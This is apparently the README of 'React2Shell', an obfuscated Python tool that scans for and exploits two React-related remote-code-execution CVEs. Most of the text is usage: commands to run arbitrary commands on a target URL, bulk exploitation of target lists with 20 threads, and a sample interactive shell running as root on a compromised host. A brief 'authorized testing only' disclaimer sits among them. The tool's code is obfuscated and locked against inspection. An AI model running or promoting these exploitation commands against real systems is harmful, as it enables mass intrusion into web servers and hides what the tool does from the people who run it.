
React2Shell - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Version: 2.0.0 (Obfuscated)
Date: 2025-12-07
python react2shell.py
That's it! The scanner will:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
Every time you run the scanner, it automatically:
If someone tries to modify the obfuscated code:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
The scanner will refuse to run if it detects any tampering.
All original features are 100% preserved:
python react2shell.py -u https://example.com
Output:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Shell Session:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
This tool is for AUTHORIZED SECURITY TESTING ONLY!
✅ Your own applications
✅ Authorized penetration tests
✅ Bug bounty programs (in scope)
✅ Security research (authorized)
❌ Unauthorized scanning
❌ Unauthorized exploitation
❌ Any illegal activity
❌ Violating terms of service
The author (LAKSHMIKANTHAN K) is not responsible for misuse of this tool. Users are solely responsible for their actions and must comply with all applicable laws.
Cause: File is corrupted
Solution: Download a fresh copy
Cause: File has been modified
Solution: Download a fresh copy (do not modify the file)
Cause: Missing dependencies
Solution:
pip install requests urllib3
Cause: Decompression overhead (minimal)
Note: Only happens once at startup, then runs at full speed
A: The code is obfuscated and compressed. You can use the original unobfuscated version if you need to read the code.
A: Minimal impact. There's a tiny delay at startup for decompression (~0.1 seconds), then it runs at full speed.
A: No. Any modification will break the integrity check and the scanner will refuse to run.
A: Obfuscation is not encryption. Determined attackers can still reverse engineer it, but it's very difficult and time-consuming.
A: Contact the author on Instagram: @letchu_pkt
Name: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
If you encounter issues:
pip install requests urllib3
python react2shell.py
Choose from the interactive menu or use CLI mode.
Follow the prompts or provide command-line arguments.
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
Thank you for using the CVE Scanner! 🚀
Version: 2.0.0 (Obfuscated)
Date: 2025-12-07
License: For authorized security testing only